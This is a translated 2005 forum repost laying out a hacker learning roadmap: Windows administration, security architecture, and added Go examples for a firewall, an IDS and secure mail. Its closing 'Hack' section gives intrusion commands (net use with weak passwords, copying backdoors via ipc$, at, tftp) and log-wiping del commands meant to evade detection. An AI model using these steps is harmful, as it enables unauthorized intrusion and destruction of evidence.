Stop being a "script kiddie" and become a real hacker! - Vulnerability warning - the black bar safety net
Sep 18, 2005
Author: Anonymous (佚名)
www.myhack58.com
There are countless versions of "how to become a hacker" online, but most of them are grandstanding.
This one is the most detailed tutorial I have seen online. I believe you will certainly benefit from it.
Reposted from: Tsinghua BBS

Basics:
How to learn

·Have a learning objective
·Have a learning plan
·Have the right mindset
·Have a strong ability to learn on your own

Learning objectives
·1. Be clear about your own direction of development (what do you want to do now or in the future: programmer? security expert? network hacker? etc.)
·2. Know your current level and ability, and how high they are:
·Simple operation of Windows 2000
·Simple configuration of some Windows 2000 services
·Proficient configuration of the various Windows 2000 services
·Proficient configuration of Win2000 together with a variety of network devices for networking
·Simple operation of one or more of Linux, Unix, HP-UX, Solaris
·Able to configure Cisco, Huawei, 3Com, Lucent and other network equipment
·Able to write simple C/C++, Delphi, Java, PB, VB, Perl
·Able to write simple ASP, PHP and CGI scripts, and shell scripts

·3. You must learn not to be conceited, and respect all kinds of ability
·Don't waste time on people who refuse to do anything themselves
·Respect other people's ability,
·Learn to enjoy the pleasure of improving your own ability.
·Once you know your level and ability, start on your goals.
·-------- Security expert
·-------- Hacker
·-------- Senior programmer
·Hacking is about building the network, not destroying it; the one who destroys is a Cracker;
·Hackers have intrusion techniques, but they maintain the network; in that they are much the same as security experts;
·Only by knowing how to intrude do you know how to maintain
·Knowing how to maintain, you learn even more about how to intrude
·This is the link between hackers and security experts
·But both of them grow on a foundation of programming!
·Here we begin our learning plan!

Learning plan
With a learning plan you learn more effectively

Security learning program
We won't ask how proficient you are with Win98, nor will we explain how to use Win98 or how to become proficient in it. We start from Win2000 Server; this is the minimum standard for our training. Some knowledge of English is also essential.

The most basic
·a. Install Win2000. Know that at installation time there are two partition formats, NTFS and FAT32, and their differences; know that Win2000 can partition and format the hard disk during installation; know that you can do a custom installation and install the components you need; and know that if there is a network adapter you can join a domain directly. Learning points: the differences between NTFS and FAT32 partitions; the role of the individual components;
the definition of a domain
·b. Know how to start up, shut down and log off, and what each is for
·c. Know the role of the main directories under Win2000: Documents and Settings, WINNT, system32 and Program Files
·d. Know the definitions of the various components in Administrative Tools
·e. Learn to use the command prompt cmd (DOS)
·f. Know every option in Computer Management
·g. Know Win2000's powerful network management functions
·h. Be able to operate Win2000 very skillfully
·i. Know the difference between IP address, subnet mask, gateway and MAC address

Advanced
·A. Configure IIS and know what the various options do
·B. Configure DNS and DHCP
·C. Configure the primary domain controller and secondary domain
·D. Configure DFS
·E. Configure Routing and Remote Access
·F. Configure IPSec security policy
·G. Configure services
·H. Configure Disk Management and disk shares
·I. Configure RAID (0, 1, 0+1, 5)
·J. Router installation and simple configuration
·K. Switch installation and simple configuration
·L. Common VPN, VLAN and NAT configuration
·M. Configuration of common enterprise-grade firewalls
·N. Configuration of common enterprise-level anti-virus software

Senior
·What we learned above is the basic knowledge that anyone who wants to become a network security expert or hacker must have
·Have you mastered it???
·If you have, it is enough to find a very good job!

Configure load balancing
·Configure WIN2000 + IIS + EXCHANGE + MSSQL + SERV-U + load balancing + ASP (PHP, CGI) + CHECK POINT (ISA SERVER)
·Configure a three-tier switched network
·Configure a variety of complex network environments
·Be able to plan a very complete network solution
·Be able to build a large enterprise network on your own
·Be able to quickly solve all kinds of difficult problems that appear in the network

The end
·Once you have learned the above, you are already a top talent, and also the goal of our VIP training!
·You can find a very good job
·Never again worry about not being able to afford roses for your girlfriend!

Security:
Overview
·System security services (SYSTEM)
·Firewall system (FIREWALL)
·Intrusion detection (IDS)
·Authentication (CA)
·Website monitoring and recovery (WEBSITE)
·Secure e-commerce (E-BUSINESS)
·Secure e-mail (E-MAIL)
·Secure office automation (OA)
·Internet access and monitoring (A&C)
·Virus prevention (VIRUS)
·Virtual private network (VPN)

System security services

·System security management
·System security assessment
·System security reinforcement
·System security maintenance
·Security skills training

System security management
·Information systems security policy
·Information Systems Administrator security manual
·Information systems user security manual
·Emergency management process

System security assessment
1. Overall system security analysis
· Analyze the user's network topology to identify the security risks in its structure and network configuration.
· Inspect the site where the user's information equipment is installed, so that the equipment is physically secure.
· Analyze the management and usage processes of the user's information system, so that the system can be managed and used securely.
2. Host system security testing
· Security-scan the hosts to find common system vulnerabilities.
· For particular systems, use specialized tools for security scanning.
· Draw on experience to analyze the system's vulnerabilities comprehensively.
· Produce a system security vulnerability report.
· Point out the cause of each security vulnerability and the danger it poses.
· Give recommendations for fixing the security vulnerabilities.
3. Network device security testing
· Security-scan the network to find network security vulnerabilities.
· Draw on experience to analyze the network devices' vulnerabilities comprehensively.
· Produce a network device security vulnerability report.
· Point out the cause of each security vulnerability and the danger it poses.
· Give recommendations for fixing the security vulnerabilities.

System security reinforcement
·Apply the latest security patches to the user's systems.
·Repair the security vulnerabilities in the user's systems and network.
·Remove unnecessary services and applications for the user.
·Set user permissions and access policies on the user's systems.
·Set file and directory access policies on the user's systems.
·Apply the corresponding security hardening to the applications on the user's systems.

System security maintenance
·Firewall system maintenance and security log analysis
·IDS system maintenance and security log analysis
·VPN system maintenance and security log analysis
·Authentication system maintenance and security log analysis
·Server and host system security log analysis
·Maintenance and log analysis of other types of security facilities

Security skills training
·Network security basics
·Demonstration of network attacks and preventive measures
·Firewall principles and use
·VPN principles and use
·Vulnerability scanning tools: principles and use
·IDS (intrusion detection system) principles and use
·Identity authentication system principles and use
·Anti-virus products: principles and use
·System administrator security training
·General user security training

Firewall system
·Firewall definition
·Firewall classification
·Packet filtering firewall
·Application gateway firewall
·Stateful inspection firewall
·General corporate firewall configuration
·Government agency firewall configuration
·Confidential gateway configuration for critical networks
·High-availability and load-balanced firewall systems
·High-speed firewall systems

Firewall definition
·A device that connects networks of different trust levels.
·Used to control the network communication between them according to established security rules.

Firewall classification
·Packet filtering (Packet Filters)
·Application gateway (Application Gateways)
·Stateful inspection (Stateful Inspection)

Packet filtering firewall
·Packet filtering technology
·Mainly implemented on routers; filters according to user-defined criteria such as IP address and port number. Packet filtering performs packet inspection at the network layer and is independent of the application.
· Advantages
· Good performance and scalability.
· Disadvantages
· Because packet filtering is not sensitive to the application and cannot understand the meaning of a specific communication, its security is very poor.

Application gateway firewall
·Application gateway technology
·The second generation of firewall technology. Application-level inspection is greatly improved: it can monitor every application layer and bring the "content" information of the corresponding application into the firewall's policy decision process.
· Advantages
· Relatively high security.
· Disadvantages
· 1. For each request two connections must be established, one from the client to the firewall system and the other from the firewall system to the server, which seriously affects performance.
· 2. The firewall gateway is exposed to the attacker.
· 3. Every agent (proxy) needs a separate application process or daemon to handle it, so scalability and support for new applications are a problem.

Stateful inspection firewall
· The third generation of firewall technology. It overcomes the disadvantages of the two methods above and introduces monitoring of all seven OSI layers, while keeping the Client/Server architecture, i.e. user access is transparent.
· The firewall can protect itself and restrict other users' access to the firewall gateway.
· Stateful inspection intercepts packets at the network layer and hands them to the INSPECT engine. Through the INSPECT engine it extracts from the packet all the state information needed for security decisions, right up to the application layer, and maintains this information in a dynamic state table, which makes it possible to anticipate subsequent connections. The method provides a solution with high security, high performance and high scalability.
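To make the difference between the generations concrete, here is an added Go example (not from the original slides): a stateless ACL that has to leave the high ports open so replies can come back, beside a stateful filter that keeps the dynamic state table described above. The packet model, the addresses and the rules are constructed for illustration.

```go
package main

import "fmt"

// Packet carries only the header fields a filter decides on (a constructed
// model, not a real packet parser).
type Packet struct {
	SrcIP, DstIP     string
	SrcPort, DstPort int
	Syn, Ack         bool
	Inbound          bool // true when arriving from the untrusted side
}

// Rule is one static ACL entry of the kind a packet-filtering router holds.
type Rule struct {
	Inbound          bool
	MinPort, MaxPort int // destination port range
	Allow            bool
}

// StatelessFilter applies rules in order: first match wins, default deny.
// It judges each packet alone, so it cannot tell a reply to a session an
// inside host opened from an unsolicited connection attempt.
func StatelessFilter(rules []Rule, p Packet) bool {
	for _, r := range rules {
		if r.Inbound == p.Inbound && p.DstPort >= r.MinPort && p.DstPort <= r.MaxPort {
			return r.Allow
		}
	}
	return false
}

// StatefulFirewall keeps the dynamic state table the page describes:
// outbound SYNs create entries, and inbound packets are admitted only when
// they belong to an existing entry or open a deliberately published service.
type StatefulFirewall struct {
	published map[int]bool    // services offered to the outside
	state     map[string]bool // tracked connections, keyed by 4-tuple
}

func NewStateful(services ...int) *StatefulFirewall {
	f := &StatefulFirewall{published: map[int]bool{}, state: map[string]bool{}}
	for _, s := range services {
		f.published[s] = true
	}
	return f
}

// connKey orders the endpoints so both directions of a flow share one entry.
func connKey(ip1 string, port1 int, ip2 string, port2 int) string {
	a, b := fmt.Sprintf("%s:%d", ip1, port1), fmt.Sprintf("%s:%d", ip2, port2)
	if a > b {
		a, b = b, a
	}
	return a + "<->" + b
}

func (f *StatefulFirewall) Filter(p Packet) bool {
	k := connKey(p.SrcIP, p.SrcPort, p.DstIP, p.DstPort)
	switch {
	case !p.Inbound && p.Syn && !p.Ack:
		f.state[k] = true // an inside host opens a session: remember it
		return true
	case f.state[k]:
		return true // part of a tracked session, in either direction
	case p.Inbound && p.Syn && !p.Ack && f.published[p.DstPort]:
		f.state[k] = true // a new session to a service we offer
		return true
	}
	return false
}

func main() {
	// An ACL that lets inside hosts browse must admit replies to ephemeral
	// ports, and that same rule admits an unsolicited SYN to 3389.
	acl := []Rule{
		{Inbound: false, MinPort: 1, MaxPort: 65535, Allow: true},
		{Inbound: true, MinPort: 1024, MaxPort: 65535, Allow: true},
	}
	out := Packet{SrcIP: "192.0.2.10", DstIP: "203.0.113.5", SrcPort: 40000, DstPort: 80, Syn: true}
	reply := Packet{SrcIP: "203.0.113.5", DstIP: "192.0.2.10", SrcPort: 80, DstPort: 40000, Syn: true, Ack: true, Inbound: true}
	rogue := Packet{SrcIP: "203.0.113.99", DstIP: "192.0.2.10", SrcPort: 40001, DstPort: 3389, Syn: true, Inbound: true}
	fmt.Println("stateless: reply", StatelessFilter(acl, reply), "rogue", StatelessFilter(acl, rogue))
	fw := NewStateful() // nothing published: 3389 is internal-only
	fmt.Println("stateful: out", fw.Filter(out), "reply", fw.Filter(reply), "rogue", fw.Filter(rogue))
}
```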

Intrusion detection system
·Typical problems encountered when handling attacks
·Ways and means of dealing with intrusions
·Network-based intrusion detection
·Host-based intrusion detection
·Typical intrusion detection system configuration

Problems encountered when handling attacks
·Insufficient information
·Not knowing what is happening on the network.
·Unable to determine whether the system has been compromised.
·Inaccurate information
·Too few staff
·Not enough maintenance personnel to manage it.
·Lack of standardized handling procedures
·How to react when an attack is discovered?
·What to do next?

Ways and means of dealing with intrusions
·Use a real-time intrusion monitoring system (IDS)
·Monitor the events occurring on systems and the network in real time.
·React immediately when an intrusion event occurs.
·Record and track intrusion events in detail.

Host-based intrusion detection
·A software module is installed on the hosts that hold important data
·It monitors the operating system logs to find attack signatures.
·The monitoring agent watches all processes and users on the host.
·It monitors brute-force login attacks, attempts to change or bypass security settings, and abuse of privileges.
·When new events are produced, the agent program is temporarily interrupted in order to reduce the CPU impact.

Network-based intrusion detection
·Software installed on a dedicated host placed on a key network segment
·The host's NIC is set to promiscuous mode, so that the host can receive all packets on the segment.
·It analyzes the packets to determine whether a hacker attack is present.
·It monitors all data on the network.
·It has no impact on network traffic.
·It can detect denial-of-service attacks, unauthorized access attempts, pre-attack scans and other attacks.
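The two monitoring approaches above are easiest to see in code. This added Go example (not part of the original slides) runs one sliding-window detector over constructed host audit lines (brute-force logons, the host-based case) and over constructed connection records as a promiscuous-mode sensor would summarise them (a pre-attack port scan, the network-based case); the log format, addresses and thresholds are assumptions.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Event is what both detectors consume: a time, a source, and a target (user name for logons, destination port for scans).
type Event struct {
	At     time.Time
	Src    string
	Target string
}

// ParseHostLog reads constructed audit lines of the form "2005-09-18T01:00:00 LOGON_FAILURE user=<name> src=<ip>"
// (an assumed layout, not the real Windows 2000 security log format).
func ParseHostLog(lines []string) []Event {
	var out []Event
	for _, ln := range lines {
		f := strings.Fields(ln)
		if len(f) != 4 || f[1] != "LOGON_FAILURE" {
			continue // successes and unrelated records are not evidence
		}
		if ts, err := time.Parse("2006-01-02T15:04:05", f[0]); err == nil {
			out = append(out, Event{At: ts, Src: strings.TrimPrefix(f[3], "src="), Target: strings.TrimPrefix(f[2], "user=")})
		}
	}
	return out
}

// SlidingWindow reports every source that reaches threshold inside some
// window of the given length. distinct=false counts raw events (brute-force
// logons); distinct=true counts distinct targets (a pre-attack port scan).
func SlidingWindow(events []Event, window time.Duration, threshold int, distinct bool) []string {
	bySrc := map[string][]Event{}
	for _, e := range events {
		bySrc[e.Src] = append(bySrc[e.Src], e)
	}
	var hits []string
	for src, evs := range bySrc {
		sort.Slice(evs, func(i, j int) bool { return evs[i].At.Before(evs[j].At) })
		for start := range evs {
			seen, n := map[string]bool{}, 0
			for j := start; j < len(evs) && evs[j].At.Sub(evs[start].At) <= window; j++ {
				seen[evs[j].Target] = true
				n++
			}
			if distinct {
				n = len(seen)
			}
			if n >= threshold {
				hits = append(hits, src)
				break // one alert per source is enough
			}
		}
	}
	sort.Strings(hits)
	return hits
}

// SampleHostLog is constructed data: four failures against "administrator" from one address in six seconds, plus noise.
func SampleHostLog() []string {
	return []string{
		"2005-09-18T01:00:00 LOGON_FAILURE user=administrator src=10.0.0.7",
		"2005-09-18T01:00:02 LOGON_FAILURE user=administrator src=10.0.0.7",
		"2005-09-18T01:00:03 LOGON_SUCCESS user=alice src=10.0.0.9",
		"2005-09-18T01:00:05 LOGON_FAILURE user=administrator src=10.0.0.7",
		"2005-09-18T01:00:06 LOGON_FAILURE user=administrator src=10.0.0.7",
		"2005-09-18T01:30:00 LOGON_FAILURE user=alice src=10.0.0.9", // a single typo, not an attack
	}
}

// SampleNetEvents is constructed data as a promiscuous-mode sensor would summarise it:
// one host sweeping ten ports in under a second, plus a legitimate client reconnecting to the web server.
func SampleNetEvents() []Event {
	base := time.Date(2005, 9, 18, 2, 0, 0, 0, time.UTC)
	evs := []Event{{At: base, Src: "10.0.0.9", Target: "80"}, {At: base.Add(time.Second), Src: "10.0.0.9", Target: "80"}}
	for i, port := range []string{"21", "22", "23", "25", "80", "135", "139", "445", "1433", "3389"} {
		evs = append(evs, Event{At: base.Add(time.Duration(i) * 100 * time.Millisecond), Src: "10.0.0.66", Target: port})
	}
	return evs
}

func main() {
	fmt.Println("brute-force sources:", SlidingWindow(ParseHostLog(SampleHostLog()), time.Minute, 4, false))
	fmt.Println("port-scan sources:", SlidingWindow(SampleNetEvents(), 5*time.Second, 8, true))
}
```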

Identity authentication system
·User authentication methods
·Security levels of the different authentication methods
·The usual way users are authenticated
·Solution to the problem
·The currently more mature two-factor authentication method

User authentication
·Something you know
· Password, ID number, date of birth
·Something you have
· Magnetic card, smart card, token, key
·Something unique to you
· Fingerprint, voice, retina

Passwords are insecure
·There are far too many password-cracking tools
·Most passwords are transmitted over the network in the clear
·Passwords can be sniffed on the network or cracked offline
·Password files can be copied off PCs and servers
·Passwords that are easy to remember are easy to guess; passwords that are hard to guess are hard to remember

Solution
·Use a combination of tools, such as an IC card + PIN

Website monitoring and recovery system
·A typical Web server application
·Security issues of Web servers
·Website security solution

Typical Web server application
·Internet -> router -> firewall -> web site
·                                    |
·                                    |
·                                 Internal
·Everything is placed behind the firewall

Security issues of Web servers
· Illegal tampering with pages is the biggest headache for website content providers. Even with a firewall in use, vulnerabilities in the Web server itself have become the main reason websites get hacked.
· Web application servers (such as IIS and Apache) have many security vulnerabilities.
· The CGI, ASP and PHP applications users develop themselves contain a large number of potential vulnerabilities.

Website security
·Use a Web server monitoring and recovery system
·The system monitors the content of the site's files in real time; if they are found to have been altered, it raises an alarm immediately and recovers them automatically.

E-commerce security system
·A typical e-commerce application
·Security issues in e-commerce
·E-commerce security solution
·Real-time data exchange system

A typical e-commerce application
·Internet -> firewall -> Web server
·                            |
·                            |
·                  Internal (database)

Security issues in e-commerce
·1. The Web server side
·Web application servers such as IIS and Apache have many security vulnerabilities. The CGI, ASP and PHP applications users develop themselves contain potential vulnerabilities.
· Hackers attack the Web server through these vulnerabilities; they can illegally tamper with pages, causing a bad impression and shaking the confidence of e-commerce users.
· They can even obtain a lot of sensitive information on the Web server, such as users' credit card numbers and the account and password used to connect to the internal database.
· They may use control of the Web server to attack the internal database.

Security issues in e-commerce
·2. The SSL protocol
·SSL encryption strength is low. The browser's default encryption module supports only 40-bit low-strength encryption, and even when a stronger encryption module is installed in the browser, the WEB server does not support high-strength SSL links, so a high-strength SSL encrypted link still cannot be achieved.
· It cannot solve the problem of user signatures in e-commerce. The secure channel that SSL establishes between the WEB server and the user's browser can only guarantee that information inside the channel is not eavesdropped on or tampered with; it cannot sign the information the user sends so as to ensure its validity and non-repudiation, which is exactly what e-commerce must address.

E-commerce security solution
·The WEB server is divided into two parts: a general-content WEB server and a transaction WEB server.
· The general-content WEB server is placed in the DMZ and protected by a website monitoring and recovery system to prevent the home page from being illegally altered.
· The transaction WEB server is placed in the internal network and connected to the DMZ through a physically separated real-time data exchange system.
· An SSL proxy is installed on the client and server sides, obtaining a 128-bit high-strength encryption channel

Real-time data exchange system
·The system physically separates the external Web server from the internal application Web server.
·The external Web server stores general information; the internal Web server stores sensitive information and connects to the internal database.
·External users access the general Web server in the DMZ over http.
·When trading, users need to access the application server in the intranet.
·The https connection first reaches the real-time data exchange system's virtual external Web server. The real-time data exchange system unwraps the https protocol and copies only the data content of the https connection to the virtual internal Web server; the virtual internal Web server then uses that data to initiate a new https connection to the actual internal application Web server.
·Inside and outside exchange data only through the real-time data exchange system; no protocol or connection passes through the real-time data exchange system itself.
·Even if the Web server in the DMZ is attacked, the attacker gets no useful information

Secure e-mail system
·E-mail security
·Secure e-mail solution
·The process of using secure mail

E-mail security
·How to ensure that sensitive information is not leaked in transmission
·How to ensure that the transmitted information is not tampered with
·How to confirm the sender's true identity
·How to prevent the sender from repudiating the message

Secure e-mail solution
·Apply the PKI system to the mail system
·Encrypt and decrypt messages to achieve data confidentiality.
·Digital signatures on mail provide sender authentication and non-repudiation.
·An integrity check function prevents information from being tampered with in transmission, for reliable security.
·Use a key system combining public keys and symmetric keys.
·Supports 128-bit symmetric key algorithms and 1024-bit public key algorithms.

Office automation system security
· How to ensure that sensitive information is not leaked in transmission
· How to ensure that the transmitted information is not tampered with
· How to confirm the sender's true identity
· How to prevent the sender from repudiating the message

Secure office automation system solution
·Apply the PKI system to the office automation system
·Encrypt and decrypt workflow information to achieve data confidentiality
·Digital signatures on workflow information provide sender authentication and non-repudiation.
·An integrity check function prevents information from being tampered with in transmission, for reliable security.
·Use a key system combining public keys and symmetric keys
·Supports 128-bit symmetric key algorithms and 1024-bit public key algorithms.
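The secure e-mail and office-automation solutions above are the same PKI recipe. This added Go example (not from the original slides) shows one instance of it with the standard library: sign with RSA-PSS, encrypt under a per-message 128-bit AES key, wrap that key with RSA-OAEP, and on opening check each of the four properties in turn. The envelope format is constructed, and the key size is raised from the page's 1024 bits to 2048.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// SecureMail is a constructed envelope (not S/MIME): the per-message AES key
// wrapped to the recipient, the GCM nonce, and ciphertext = signature || body.
type SecureMail struct {
	WrappedKey, Nonce, Ciphertext []byte
}

// NewKeyPair makes a user's RSA key; the page's 1024 bits is a 2005 figure, 2048 is today's floor.
func NewKeyPair() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err) // only a broken random source gets here
	}
	return k
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal provides the page's four properties: RSA-PSS signs for sender authentication
// and non-repudiation, AES-128-GCM gives confidentiality plus an integrity check, and
// RSA-OAEP wraps the 128-bit key so only the recipient can unwrap it.
func Seal(plain []byte, sender *rsa.PrivateKey, recipient *rsa.PublicKey) (*SecureMail, error) {
	digest := sha256.Sum256(plain)
	sig, err := rsa.SignPSS(rand.Reader, sender, crypto.SHA256, digest[:], nil)
	if err != nil {
		return nil, err
	}
	buf := make([]byte, 16+12) // fresh 128-bit key and 96-bit GCM nonce per message
	if _, err := rand.Read(buf); err != nil {
		return nil, err
	}
	key, nonce := buf[:16], buf[16:]
	gcm, _ := newGCM(key) // a 16-byte key cannot fail
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, recipient, key, nil)
	if err != nil {
		return nil, err
	}
	// The signature travels inside the encrypted body, hidden from eavesdroppers.
	body := append(append([]byte{}, sig...), plain...)
	return &SecureMail{WrappedKey: wrapped, Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, body, nil)}, nil
}

// Open reverses Seal and names the property that failed.
func Open(m *SecureMail, recipient *rsa.PrivateKey, sender *rsa.PublicKey) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, recipient, m.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("confidentiality: not addressed to this key")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	body, err := gcm.Open(nil, m.Nonce, m.Ciphertext, nil)
	n := sender.Size() // a PSS signature is as long as the RSA modulus
	if err != nil || len(body) < n {
		return nil, errors.New("integrity: ciphertext was tampered with or truncated")
	}
	sig, plain := body[:n], body[n:]
	digest := sha256.Sum256(plain)
	if err := rsa.VerifyPSS(sender, crypto.SHA256, digest[:], sig, nil); err != nil {
		return nil, errors.New("authentication: signature does not match the claimed sender")
	}
	return plain, nil
}

func main() {
	alice, bob := NewKeyPair(), NewKeyPair()
	m, _ := Seal([]byte("constructed sample: Q3 price list"), alice, &bob.PublicKey)
	plain, err := Open(m, bob, &alice.PublicKey)
	fmt.Println(string(plain), err)
}
```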

Internet access and control system
·Problems with Internet use
·Solutions for Internet use
·The content cache system
·The Internet site filtering system

Internet access problems
·Internet access bandwidth is insufficient and access is slow.
·Many users access the same content, so the bandwidth gets even more crowded.
·During office hours much of the Internet access is unrelated to business.
·Someone is using the company's Internet system to access ** websites.
·Someone is using the company's Internet system to access reactionary websites.
·Managers have no way of knowing how the Internet system is being used.

Internet access solutions
· For problem one, use a content cache system.
· For problem two, use an Internet site filtering system.

The content cache system
·1. The client initiates an http connection request
·2. The proxy receives the request and checks whether the required content is in its internal cache; if so, it is returned to the client.
·3. If not, the proxy initiates a request to the destination server according to the client's request.
·4. The Web server returns the content to the proxy server.
·5. The proxy server sends the content it obtained back to the client and keeps a copy in its own cache.

Internet site filtering system (I)
·1. The client initiates an http connection request
·2. When the connection arrives at the firewall, the firewall sends the URL to the WebSense server to be checked.
·3. WebSense sends the check result back to the firewall.
·4. The firewall decides according to its policy whether to let the connection through.
Internet site filtering system (II)
·1. The client initiates an http connection request
·2. After receiving the request, the proxy sends the URL to the WebSense server to be checked.
·3. The proxy decides according to the returned result whether to accept the connection request.

Virus prevention system
· Anti-virus system requirements in the Internet era
· Computer virus solution
· A typical virus prevention system deployment

Anti-virus system requirements in the Internet era
· Because computers are networked, the paths by which viruses spread have greatly increased (network file shares, e-mail, Internet file downloads), and the speed of propagation has greatly increased as well.
· New viruses appear faster and faster, and users' anti-virus software fails to update its virus signatures in time.
· Malicious Java and ActiveX now exist; when a user browses a web page containing such code, it causes security problems.
· Some unsolicited e-mail programs or downloaded programs carry Trojan horses, which may put the victim host under someone else's control.

Computer virus solution
· From a system viewpoint, configure anti-virus software at every route by which viruses spread: clients (Win98, Win2000), file servers (NT, Netware), e-mail servers (Exchange, Lotus Notes), Internet access systems (Proxy, Firewall), etc.
· The whole virus prevention system uses a centralized management model: virus signature updates are unified and security policy is set centrally, so that the virus signatures across the whole network are updated quickly.
· Virus-checking software embedded in the client browser, the Proxy and the Firewall prevents attacks by downloaded programs carrying viruses and by possible malicious Java, ActiveX and other executable code.

VPN (virtual private network)
· Classification of data encryption
· Physical line encryption
· Data link encryption
· Network layer encryption: IPSec
· Transport layer encryption: SSL

Types of data encryption
·Physical layer -> physical layer: physical line encryption
·Data link layer -> data link layer (router access)
·At the data link layer, e.g. encryption of PPP: L2TP, PPTP and L2F
·Network layer -> network layer (router, firewall, host)
·At the network layer, e.g. encryption of IP: IPSec
·Transport layer -> transport layer (encryption of TCP: SSL)
·Application layer -> application layer (e.g. S/MIME, SET, SSH)

Physical line encryption
· DDN encryption machine
· Frame Relay encryption machine
· Asynchronous dial-up modem
· ISDN line cipher machine
· ATM encryptor

Note: transport layer encryption
·Secure Sockets Layer (SSL) is an end-to-end Internet security protocol; through the use of digital certificates it provides data encryption and identity authentication. SSL sits at the transport layer; the client and server establish an end-to-end secure session at the application level.
·SSL proxy: 128-bit high-strength encryption module
Conclusion: congratulations!
·If you have completed all of this and can apply it skillfully, you are already a real network security expert!
·I hope that by this time you have a gentle and slightly naughty girlfriend at your side, to add a little lively color to the solitude and loneliness of the network!

Hack:
Commands you must master
·net
·netsh
·ftp
·hostname
·telnet (nc)
·tracert
·at
·tftp
·netstat
·regedit
·ping

Protocols you must master
·http
·dns
·ftp
·pop
·smtp
·icmp
·udp
·tcp

Getting started
·Master the hacking methods and tools, and learning to hack becomes much simpler!
·Once you have mastered these, what remains is to use the tools to intrude
·Be familiar with a set of hacking tools that you use yourself

Senior
·Write your own dedicated hacking tools
·Discover system vulnerabilities

Hacking methods
·Collect information:
· Collect information about the target you want to intrude into
· IP, domain, ports, vulnerabilities, location

Weak passwords
·On NT/2000/XP/2003 a weak password can be used
·net use \\ip "password" /user:user
·If the target machine has the 3389 service open, you can connect directly
·With a weak SQL sa password, you can log in directly with a SQL connector

Backdoor Trojans
·If there is an ipc$ share, you can copy a backdoor Trojan over
·Start it with at
·at \\ip time /INTERACTIVE
·If you can get a shell, you can also use tftp
·tftp.exe -i ip get . .
·Then install it; if 3389 is there, you can build your own IIS, download directly and run

Password cracking
·Remote cracking of mysql, mssql, ftp, mail and share passwords
·Local cracking of the administrator password

Buffer overflow
·Buffer overflow attacks can be used,
·such as the popular WebDAV and RPC DCOM module vulnerabilities,
·to directly obtain system administrator privileges
·After a buffer overflow the usual sight is:
·Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

Web service vulnerabilities
·For example:
·The Unicode vulnerability, to traverse the disk and execute programs
·The double-decoding vulnerability, to traverse the disk and execute programs
·The .HTR vulnerability, to view source code

Sniffing and eavesdropping
·For example:
·Eavesdropping on the web
·Eavesdropping on mail
·Tools such as: Sniffer, Iris

Spoofing attacks
·For example:
·Attacks using ARP spoofing

Disguise and deception
·Common examples: mail viruses
·Change a file's name or even its icon to trick the other party into running it

Social engineering
·For example:
·QQ chat enticement
·E-mail information
·Telephone
·Temptation

Denial of service
·For example:
·DoS attacks
·DDoS attacks

Using springboards
·Use your broilers (compromised machines) as springboards to attack other machines
·My PC -> springboard (broiler) -> target

Router vulnerabilities
·Such as:
·The default password
·Bugs

Firewall
·Use deception to attack the firewall and make its functions fail
·Use vulnerabilities in firewall modules

unix/linux
·NetWare, Linux, Unix, Solaris, HP-UX, AIX, etc.
·These are not explained here for now

Mastering hacking tools
·You must have a set of hacking tools that you fully command yourself
·Such as port scanners: Nscan, bluescanport
·Monitoring tools: Sniffer, Iris
·Telnet tool: nc
·Scanning tools: sss, nmap, LANguard
·Backdoor tools: radmin, winshell
·Password cracking: lc4
·Remote management: pcAnywhere
·Be able to use all the classic hacking tools

Clearing traces
·After you have intruded into a machine, completely clear the traces you left on it before you leave
·For example, clear:
·del C:\WINNT\system32\LogFiles\*.*
·del C:\WINNT\system32\*.log
·del C:\WINNT\system32\*.txt
·del C:\WINNT\*.log
·del c:\winnt\*.txt

If you don't clear your traces
·When the target machine's admin finds your evidence
·it can certainly earn you a spell inside

Hacker
·When you have fully mastered all of this
·you have become a minor hacker

Senior
·Write your own hacking tools
·Discover system vulnerabilities

Advanced hacker
·Now you are ready to become an advanced hacker.

The real hacker
·Proficient in all kinds of network protocols
·Proficient in operating systems
·Proficient in programming techniques
·Proficient in security defense
·Does not vandalize
·Takes on challenging technical problems

The end
·If you want to learn all this, don't rely on others to hand it to you; get it through your own effort and your own self-study!
·Others can only guide you and tell you the method,
·the real work is your own, after many nights of effort
·It is not about how many times you ask a question; do more with your hands and use your brain!
·Google has so many answers; why can't I find them? Because your keywords are wrong!
·Hacker Base aims to cultivate a group of outstanding network talent and give more enthusiasts who want to learn networking an ideal learning environment
·This three-part slide deck is the gift of our many years of experience!
·Very valuable; do save it and study it carefully!

The pinnacle of technology
·I hope we can reach it here together!